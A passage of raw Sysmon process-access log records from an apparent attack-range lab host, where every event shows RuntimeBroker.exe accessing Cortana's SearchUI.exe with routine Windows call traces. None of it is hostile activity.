indows\System32\RPCRT4.dll+5187d 10341000x800000000000000011768Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11164952C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41550|C:\Windows\system32\windows.cortana.Desktop.dll+9248|C:\Windows\system32\windows.cortana.Desktop.dll+12c21|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011767Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11165960C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41838|C:\Windows\system32\windows.cortana.Desktop.dll+164d7|C:\Windows\system32\windows.cortana.Desktop.dll+12c8b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011766Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11165960C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41550|C:\Windows\system32\windows.cortana.Desktop.dll+9248|C:\Windows\system32\windows.cortana.Desktop.dll+12c21|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011765Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11165576C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41838|C:\Windows\system32\windows.cortana.Desktop.dll+164d7|C:\Windows\system32\windows.cortana.Desktop.dll+12c8b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011764Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41838|C:\Windows\system32\windows.cortana.Desktop.dll+164d7|C:\Windows\system32\windows.cortana.Desktop.dll+12c8b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011763Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11165576C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41550|C:\Windows\system32\windows.cortana.Desktop.dll+9248|C:\Windows\system32\windows.cortana.Desktop.dll+12c21|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011762Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11165976C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41838|C:\Windows\system32\windows.cortana.Desktop.dll+164d7|C:\Windows\system32\windows.cortana.Desktop.dll+12c8b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011761Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41550|C:\Windows\system32\windows.cortana.Desktop.dll+9248|C:\Windows\system32\windows.cortana.Desktop.dll+12c21|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011760Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11164952C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41838|C:\Windows\system32\windows.cortana.Desktop.dll+164d7|C:\Windows\system32\windows.cortana.Desktop.dll+12c8b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011759Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11165980C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41838|C:\Windows\system32\windows.cortana.Desktop.dll+164d7|C:\Windows\system32\windows.cortana.Desktop.dll+12c8b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011758Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11164952C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41550|C:\Windows\system32\windows.cortana.Desktop.dll+9248|C:\Windows\system32\windows.cortana.Desktop.dll+12c21|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011757Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11165980C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41550|C:\Windows\system32\windows.cortana.Desktop.dll+9248|C:\Windows\system32\windows.cortana.Desktop.dll+12c21|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011756Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11165976C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41550|C:\Windows\system32\windows.cortana.Desktop.dll+9248|C:\Windows\system32\windows.cortana.Desktop.dll+12c21|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011755Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.888{08A6967A-4753-6000-0D05-000000009A01}11165960C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41838|C:\Windows\system32\windows.cortana.Desktop.dll+164d7|C:\Windows\system32\windows.cortana.Desktop.dll+12c8b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011754Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.888{08A6967A-4753-6000-0D05-000000009A01}11165960C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41550|C:\Windows\system32\windows.cortana.Desktop.dll+9248|C:\Windows\system32\windows.cortana.Desktop.dll+12c21|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011753Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.888{08A6967A-4753-6000-0D05-000000009A01}11164952C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41838|C:\Windows\system32\windows.cortana.Desktop.dll+164d7|C:\Windows\system32\windows.cortana.Desktop.dll+12c8b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011752Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.888{08A6967A-4753-6000-0D05-000000009A01}11165576C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41838|C:\Windows\system32\windows.cortana.Desktop.dll+164d7|C:\Windows\system32\windows.cortana.Desktop.dll+12c8b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011751Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.888{08A6967A-4753-6000-0D05-000000009A01}11165504C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41838|C:\Windows\system32\windows.cortana.Desktop.dll+164d7|C:\Windows\system32\windows.cortana.Desktop.dll+12c8b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011750Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.888{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41838|C:\Windows\system32\windows.cortana.Desktop.dll+164d7|C:\Windows\system32\windows.cortana.Desktop.dll+12c8b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011749Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.888{08A6967A-4753-6000-0D05-000000009A01}11164952C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41550|C:\Windows\system32\windows.cortana.Desktop.dll+9248|C:\Windows\system32\windows.cortana.Desktop.dll+12c21|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Wi